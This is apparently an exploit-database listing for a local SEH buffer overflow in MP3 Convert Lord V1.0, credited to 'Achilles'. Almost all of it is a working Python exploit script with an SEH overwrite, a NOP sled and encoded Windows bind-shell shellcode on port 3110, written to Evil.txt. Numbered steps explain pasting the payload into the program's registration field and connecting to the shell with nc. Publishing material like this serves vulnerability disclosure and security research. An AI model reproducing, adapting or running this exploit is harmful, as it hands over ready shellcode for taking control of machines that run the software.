MP3 Convert Lord V1.0 Local Seh Exploit

2026.01.07

Credit: Achilles

Risk: High

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# Exploit Title: MP3 Convert Lord V1.0 Local Seh Exploit
# Date: 28.12.2025
# Vendor Homepage: http://www.avlord.com/
# Software Link:   https://www.softpedia.com/dyn-postdownload.php/baa965c6b5d22d62987a4638f33d5ec1/63b86eb2/3ecb/4/2
# Exploit Author: Achilles
# Tested Version: 1.0
# Tested on: Windows 11 x64

# 1.- Run python code : MP3 Convert Lord.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open MP3 Convert Lord and press HELP and REGISTRATION
# 4.- Paste the Content of EVIL.txt into the 'Username and Registrationcode Field'
# 5.- Click 'OK' and you will have a bind shell port 3110.
# 6.- Nc.exe 127.0.0.1 3110
#!/usr/bin/env python

import struct

buffer = "\x41" * 572
nseh = "\x90\x90\xEB\x0B" #jmp short 6
seh  =  struct.pack('<L',0x10016eed) #DLL_LORDM.dll
nops =  "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xda\xdf\xd9\x74\x24\xf4\xbe\xb3\x33\x93\x92\x5d"
"\x2b\xc9\xb1\x53\x83\xc5\x04\x31\x75\x13\x03\xc6"
"\x20\x71\x67\xd4\xaf\xf7\x88\x24\x30\x98\x01\xc1"
"\x01\x98\x76\x82\x32\x28\xfc\xc6\xbe\xc3\x50\xf2"
"\x35\xa1\x7c\xf5\xfe\x0c\x5b\x38\xfe\x3d\x9f\x5b"
"\x7c\x3c\xcc\xbb\xbd\x8f\x01\xba\xfa\xf2\xe8\xee"
"\x53\x78\x5e\x1e\xd7\x34\x63\x95\xab\xd9\xe3\x4a"
"\x7b\xdb\xc2\xdd\xf7\x82\xc4\xdc\xd4\xbe\x4c\xc6"
"\x39\xfa\x07\x7d\x89\x70\x96\x57\xc3\x79\x35\x96"
"\xeb\x8b\x47\xdf\xcc\x73\x32\x29\x2f\x09\x45\xee"
"\x4d\xd5\xc0\xf4\xf6\x9e\x73\xd0\x07\x72\xe5\x93"
"\x04\x3f\x61\xfb\x08\xbe\xa6\x70\x34\x4b\x49\x56"
"\xbc\x0f\x6e\x72\xe4\xd4\x0f\x23\x40\xba\x30\x33"
"\x2b\x63\x95\x38\xc6\x70\xa4\x63\x8f\xb5\x85\x9b"
"\x4f\xd2\x9e\xe8\x7d\x7d\x35\x66\xce\xf6\x93\x71"
"\x31\x2d\x63\xed\xcc\xce\x94\x24\x0b\x9a\xc4\x5e"
"\xba\xa3\x8e\x9e\x43\x76\x3a\x96\xe2\x29\x59\x5b"
"\x54\x9a\xdd\xf3\x3d\xf0\xd1\x2c\x5d\xfb\x3b\x45"
"\xf6\x06\xc4\x65\x21\x8e\x22\x1f\x3d\xc6\xfd\xb7"
"\xff\x3d\x36\x20\xff\x17\x6e\xc6\x48\x7e\xa9\xe9"
"\x48\x54\x9d\x7d\xc3\xbb\x19\x9c\xd4\x91\x09\xc9"
"\x43\x6f\xd8\xb8\xf2\x70\xf1\x2a\x96\xe3\x9e\xaa"
"\xd1\x1f\x09\xfd\xb6\xee\x40\x6b\x2b\x48\xfb\x89"
"\xb6\x0c\xc4\x09\x6d\xed\xcb\x90\xe0\x49\xe8\x82"
"\x3c\x51\xb4\xf6\x90\x04\x62\xa0\x56\xff\xc4\x1a"
"\x01\xac\x8e\xca\xd4\x9e\x10\x8c\xd8\xca\xe6\x70"
"\x68\xa3\xbe\x8f\x45\x23\x37\xe8\xbb\xd3\xb8\x23"
"\x78\xe3\xf2\x69\x29\x6c\x5b\xf8\x6b\xf1\x5c\xd7"
"\xa8\x0c\xdf\xdd\x50\xeb\xff\x94\x55\xb7\x47\x45"
"\x24\xa8\x2d\x69\x9b\xc9\x67")
pad ="B" * (8000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
payload = buffer + nseh + seh + nops + shellcode +pad

try:
	    f=open("Evil.txt","w")
	    print "[+] Creating %s bytes evil payload.." %len(payload)
	    f.write(payload)
	    f.close()
	    print "[+] File created!"
except:
	    print "File cannot be created"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

MP3 Convert Lord V1.0 Local Seh Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.